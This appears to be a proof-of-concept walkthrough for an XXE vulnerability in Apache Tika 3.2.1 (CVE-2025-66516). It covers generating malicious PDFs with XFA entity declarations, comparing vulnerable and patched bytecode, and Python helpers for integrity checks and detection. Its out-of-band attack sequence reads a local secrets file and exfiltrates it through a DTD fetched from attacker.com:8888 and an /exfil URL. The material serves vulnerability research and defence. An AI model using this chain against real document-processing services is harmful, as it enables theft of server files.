## https://sploitus.com/exploit?id=D9B0ECDF-4B8A-5236-88D7-DFA7BB1F80BF
# ⚠️ **[READ DISCLAIMER BEFORE USE](DISCLAIMER.md)** ⚠️
**Educational/Authorized Testing Only** | [License](LICENSE) | [Security Policy](SECURITY.md)

---

## Setup POC Directory

```bash
mkdir apache_tika_poc
cd apache_tika_poc
```

## Environment Verification

```bash
# Check Java version
java -version
javac -version

# Check OS version
lsb_release -a
```

## Download Apache Tika JARs

```bash
# Download vulnerable Tika version
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.1/tika-app-3.2.1.jar

# Download patched Tika version  
wget https://repo1.maven.org/maven2/org/apache/tika/tika-app/3.2.2/tika-app-3.2.2.jar
```
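Before analysing the JARs, it is worth confirming that they arrived intact. Maven Central normally publishes a `.sha1` file next to each artifact. The sketch below assumes that layout and uses only the Python standard library. `BASE`, `sha1_matches`, and `download_and_verify` are hypothetical helper names and are not part of any Tika tooling.

```python
import hashlib
import urllib.request

# Assumed Maven Central layout: <BASE>/<version>/tika-app-<version>.jar(.sha1)
BASE = "https://repo1.maven.org/maven2/org/apache/tika/tika-app"


def sha1_matches(data: bytes, sha1_text: str) -> bool:
    """Compare the SHA-1 of `data` with the hex digest in a .sha1 file.

    Some .sha1 files append the file name after the digest, so only the
    first whitespace-separated token is used.
    """
    tokens = sha1_text.split()
    if not tokens:
        return False
    return hashlib.sha1(data).hexdigest() == tokens[0].lower()


def download_and_verify(version: str) -> str:
    """Fetch tika-app-<version>.jar and its .sha1, verify, then save the JAR."""
    name = f"tika-app-{version}.jar"
    url = f"{BASE}/{version}/{name}"
    with urllib.request.urlopen(url) as resp:
        data = resp.read()
    with urllib.request.urlopen(url + ".sha1") as resp:
        sha1_text = resp.read().decode("ascii")
    if not sha1_matches(data, sha1_text):
        raise ValueError(f"SHA-1 mismatch for {name}; not saving it")
    with open(name, "wb") as fh:
        fh.write(data)
    return name
```

For example, `download_and_verify("3.2.1")` writes `tika-app-3.2.1.jar` only if its digest matches. SHA-1 is used here as an integrity check against corrupted downloads, not as a strong authenticity guarantee.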

## Verify Component Versions

```bash
# Check vulnerable version manifest
unzip -p tika-app-3.2.1.jar META-INF/MANIFEST.MF

# Check patched version manifest
unzip -p tika-app-3.2.2.jar META-INF/MANIFEST.MF
```

### List Component POM Properties
The bundled Maven `pom.properties` files (each records a module's `groupId`, `artifactId`, and `version`) show no separate `tika-parsers` artifact, even though the security advisories mention one. This is most likely version-related: our assumption is that in 3.2.1 and 3.2.2, the versions used in this POC, the monolithic `tika-parsers` module has been replaced by individual parser modules such as `tika-parser-pdf-module`.

```bash
# List all component pom.properties files for both versions
unzip -l tika-app-3.2.1.jar | grep pom.properties | grep tika
unzip -l tika-app-3.2.2.jar | grep pom.properties | grep tika
```

### Check Tika Component Versions

```bash
# Print tika-core, tika-parser-pdf-module, and tika-app versions for both releases
for v in 3.2.1 3.2.2; do
  for m in tika-core tika-parser-pdf-module tika-app; do
    echo "--- tika-app-$v.jar: $m"
    unzip -p "tika-app-$v.jar" "META-INF/maven/org.apache.tika/$m/pom.properties"
  done
done
```
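The same information can be gathered programmatically. The following is a minimal sketch. It assumes the `META-INF/maven/org.apache.tika/<artifactId>/pom.properties` layout shown by the `unzip -l` listing. `tika_module_versions` and `parse_properties` are hypothetical helpers, and the properties parser handles only simple `key=value` lines.

```python
import zipfile

# Assumed location of the per-module Maven metadata inside tika-app
PREFIX = "META-INF/maven/org.apache.tika/"


def parse_properties(text: str) -> dict:
    """Minimal .properties parser: key=value lines; '#'/'!' comments skipped."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def tika_module_versions(jar_path: str) -> dict:
    """Map artifactId -> version for every org.apache.tika pom.properties."""
    versions = {}
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if name.startswith(PREFIX) and name.endswith("/pom.properties"):
                props = parse_properties(jar.read(name).decode("utf-8"))
                versions[props.get("artifactId", name)] = props.get("version")
    return dict(sorted(versions.items()))
```

Printing `tika_module_versions("tika-app-3.2.1.jar")` next to the 3.2.2 result should make any mismatch between `tika-core` and `tika-parser-pdf-module` easy to spot.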

## Create Target File for XXE Exploitation

```bash
# Create target secret file
echo "INTERNAL_SERVER_KEY=EXPOSED" > fake-secrets.txt
```

## Code Analysis: Compare Vulnerable vs Patched

```bash
# Extract vulnerable JAR for analysis
mkdir tika-3.2.1-extract && cd tika-3.2.1-extract && unzip -q ../tika-app-3.2.1.jar && cd ..

# Extract patched JAR for analysis
mkdir tika-3.2.2-extract && cd tika-3.2.2-extract && unzip -q ../tika-app-3.2.2.jar && cd ..

# Disassemble the vulnerable class (javap prints bytecode, not Java source; -p includes private members)
cd tika-3.2.1-extract && javap -c -p org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.1.txt && cd ..

# Disassemble the patched class
cd tika-3.2.2-extract && javap -c -p org/apache/tika/utils/XMLReaderUtils.class > ../XMLReaderUtils-3.2.2.txt && cd ..

# Compare versions
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt
```

### Identify The Fix
Comparing the two listings shows that 3.2.2 disables Document Type Definition (DTD) processing and external entity support in `XMLReaderUtils`. This is the crux of the fix. The relevant lines can be isolated with:

```bash
diff -u XMLReaderUtils-3.2.1.txt XMLReaderUtils-3.2.2.txt | grep -A2 -B2 "accessExternalDTD\|supportDTD\|isSupportingExternalEntities"
```
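Because javap output shifts constant-pool indices between builds, the raw diff is noisy. The following small filter is a sketch that assumes the `XMLReaderUtils-*.txt` files produced earlier. It keeps only the added or removed lines that mention the same property names as the `grep` command. The function names are hypothetical. Unlike `grep -A2 -B2`, it prints no surrounding context.

```python
import difflib
import re

# Same property-name fragments the grep command looks for.
KEYWORDS = re.compile(r"accessExternalDTD|supportDTD|isSupportingExternalEntities")


def xxe_related_changes(old: str, new: str) -> list:
    """Return added ('+') or removed ('-') diff lines that mention a keyword."""
    diff = list(difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm=""))
    hits = []
    for line in diff[2:]:  # diff[:2] are the '---'/'+++' file headers
        if line.startswith(("+", "-")) and KEYWORDS.search(line):
            hits.append(line)
    return hits


def compare_files(old_path: str, new_path: str) -> list:
    """Convenience wrapper over the two javap dumps."""
    with open(old_path, encoding="utf-8") as a, open(new_path, encoding="utf-8") as b:
        return xxe_related_changes(a.read(), b.read())
```

Usage: `print("\n".join(compare_files("XMLReaderUtils-3.2.1.txt", "XMLReaderUtils-3.2.2.txt")))`.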

## POC #1: Local File Read XXE

```bash
# Generate malicious PDF
python3 ./gen_poc.py

# Test with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve_2025_66516_poc.pdf

# Test with patched Tika 3.2.2
java -jar tika-app-3.2.2.jar -t cve_2025_66516_poc.pdf
```
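Instead of reading both outputs by eye, we can check whether the contents of `fake-secrets.txt` appear in the extracted text. This sketch assumes that `java` is on the `PATH` and that the two JARs and `cve_2025_66516_poc.pdf` are in the current directory. It also assumes the marker is exactly the string written to `fake-secrets.txt` earlier. `marker_leaked` and `compare` are hypothetical names. The `run` parameter exists only so that the subprocess call can be stubbed out.

```python
import subprocess

# Must match what was written to fake-secrets.txt earlier.
MARKER = "INTERNAL_SERVER_KEY=EXPOSED"
JARS = ("tika-app-3.2.1.jar", "tika-app-3.2.2.jar")


def marker_leaked(jar: str, pdf: str, marker: str = MARKER, run=subprocess.run) -> bool:
    """Run `java -jar <jar> -t <pdf>` and report whether stdout contains marker."""
    result = run(
        ["java", "-jar", jar, "-t", pdf],
        capture_output=True,
        text=True,
        errors="replace",  # tolerate non-UTF-8 bytes in Tika's output
        timeout=120,
    )
    return marker in result.stdout


def compare(pdf: str, jars=JARS, run=subprocess.run) -> dict:
    """Map each JAR name to whether the marker leaked into its text output."""
    return {jar: marker_leaked(jar, pdf, run=run) for jar in jars}
```

`compare("cve_2025_66516_poc.pdf")` returns a dict keyed by JAR name. If the POC behaves as described, only the 3.2.1 entry should be `True`.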

## POC #2: Out-of-Band XXE

```bash
# Generate out-of-band XXE PDF
python3 ./gen_oob_poc.py

# Start the HTTP listener (in a separate terminal, before running Tika)
python3 ./http_listener.py

# Test OOB XXE with vulnerable Tika 3.2.1
java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf

# Test OOB XXE with patched Tika 3.2.2  
java -jar tika-app-3.2.2.jar -t cve-2025-66516_OOB_XXE.pdf
```

## Application-Level Testing

```bash
# Compile with vulnerable Tika
javac -cp tika-app-3.2.1.jar DocumentProcessor.java

# Run with vulnerable Tika
java -cp tika-app-3.2.1.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf

# Compile with patched Tika
javac -cp tika-app-3.2.2.jar DocumentProcessor.java

# Run with patched Tika
java -cp tika-app-3.2.2.jar:. DocumentProcessor ./cve_2025_66516_poc.pdf
```

## Cleanup

```bash
# Remove extraction directories
rm -rf tika-3.2.2-extract/
rm -rf tika-3.2.1-extract/
rm XMLReaderUtils-*.txt
```

---

## Understanding the Attack Flow

### Local File System XXE Attack Sequence

1. PDF contains an XFA stream with a DOCTYPE + ENTITY declaration
2. Tika detects XFA → calls XFAExtractor
3. XFAExtractor creates an XML parser via XMLReaderUtils
4. Parser processes the DOCTYPE and registers the `xxe` entity
5. Parser encounters the `&xxe;` reference
6. Parser resolves the entity → reads `file:///fake-secrets.txt`
7. File contents are inserted into the XML at the `&xxe;` location
8. XFAExtractor extracts the field value = file contents
9. Application receives the secret data in Tika's output
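Step 1 is also the easiest place to detect the attack statically. The heuristic below is a sketch rather than a real PDF parser. It scans every `stream ... endstream` body and tries Flate decompression, falling back to the raw bytes. It then flags bodies that contain `<!DOCTYPE` or `<!ENTITY`. It assumes XFA packets are stored as plain or `/FlateDecode` streams. Other filters, encryption, or unusual whitespace around the `stream` keyword will slip past it. All names are hypothetical.

```python
import re
import zlib

# Naive stream matcher: "stream" EOL ... EOL "endstream" (CRLF or LF).
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def decoded_streams(pdf: bytes):
    """Yield each stream body, Flate-decoded when possible, else raw."""
    for match in STREAM_RE.finditer(pdf):
        raw = match.group(1)
        try:
            # decompressobj tolerates truncated input (e.g. a trimmed EOL byte)
            body = zlib.decompressobj().decompress(raw)
        except zlib.error:
            body = raw  # not zlib data: scan the bytes as-is
        yield body


def flag_dtd_streams(pdf: bytes) -> list:
    """Return indices (in file order) of streams containing a DTD marker."""
    return [
        i
        for i, body in enumerate(decoded_streams(pdf))
        if any(marker in body for marker in DTD_MARKERS)
    ]
```

If you pass it the bytes of `cve_2025_66516_poc.pdf`, it should return a non-empty list, provided the generated PDF embeds its DOCTYPE as described in step 1.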

### Out-of-Band (OOB) XXE Attack Sequence

1. PDF contains XFA with a DOCTYPE declaring parameter entities (`%file`, `%dtd`)
2. Tika detects XFA → calls XFAExtractor
3. XFAExtractor creates an XML parser via XMLReaderUtils
4. Parser processes the DOCTYPE and registers the `%file` entity → points to `file:///fake-secrets.txt`
5. Parser encounters the `%dtd;` reference → points to `http://attacker.com:8888/evil.dtd`
6. Parser makes an HTTP GET request to the attacker's server to fetch evil.dtd
7. Attacker's HTTP server receives the request and serves the evil.dtd content
8. Parser processes evil.dtd, which defines a `%payload` parameter entity whose value declares the `&send` entity
9. Parser expands `%payload;` → declares the `&send` entity with the exfiltration URL
10. `&send` points to: `http://attacker.com:8888/exfil?data=%file;`
11. Parser expands `%file;` inside the `&send` URL → file contents are inserted
12. Parser resolves the `&send;` reference → makes an HTTP GET to the exfiltration endpoint
13. Attacker's HTTP server receives the `/exfil` request with the file contents in the URL parameter
14. Attacker extracts the data from the URL parameter and logs the secret file contents
15. Application output is irrelevant → the data has already been exfiltrated to the attacker's server
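The OOB variant relies on parameter entities and on external identifiers that point at network URLs. Both are visible in the DOCTYPE before any request is made. Below is a minimal, regex-based classifier for the entity declarations in a DOCTYPE internal subset. It is a hypothetical sketch, not a DTD parser. It ignores comments and conditional sections, and it cannot see declarations that only arrive in a remotely fetched DTD such as `evil.dtd` in step 8.

```python
import re
from typing import NamedTuple
from urllib.parse import urlparse

DECL_RE = re.compile(
    r"""<!ENTITY\s+
        (%\s+)?                      # group 1: '%' marks a parameter entity
        ([^\s%>]+)\s+                # group 2: entity name
        (SYSTEM|PUBLIC)?\s*          # group 3: external-id keyword, if any
        (                            # group 4: one or two quoted literals
          (?:"[^"]*"|'[^']*')
          (?:\s*(?:"[^"]*"|'[^']*'))?
        )""",
    re.VERBOSE,
)
LITERAL_RE = re.compile(r"""(?:"([^"]*)")|(?:'([^']*)')""")


class EntityDecl(NamedTuple):
    name: str
    parameter: bool    # declared as <!ENTITY % name ...>
    external: bool     # has a SYSTEM or PUBLIC identifier
    scheme: str        # URI scheme of the system identifier ("" if none)
    nested_decl: bool  # internal value that itself declares an entity


def classify_entities(subset: str) -> list:
    """Classify every <!ENTITY ...> declaration found in `subset`."""
    decls = []
    for m in DECL_RE.finditer(subset):
        literals = [dq or sq for dq, sq in LITERAL_RE.findall(m.group(4))]
        external = m.group(3) is not None
        # For PUBLIC ids the system literal is the last one; SYSTEM has one.
        system_id = literals[-1] if external else ""
        decls.append(
            EntityDecl(
                name=m.group(2),
                parameter=m.group(1) is not None,
                external=external,
                scheme=urlparse(system_id).scheme,
                nested_decl=not external and "<!ENTITY" in literals[0],
            )
        )
    return decls


def risky(decls: list) -> list:
    """Names of external entities or entities whose value declares another."""
    return [d.name for d in decls if d.external or d.nested_decl]
```

It is reasonable to treat anything that `risky` returns as hostile in an XFA packet. This includes external identifiers, especially those with `file`, `http`, or `https` schemes, and values that declare further entities as in step 8.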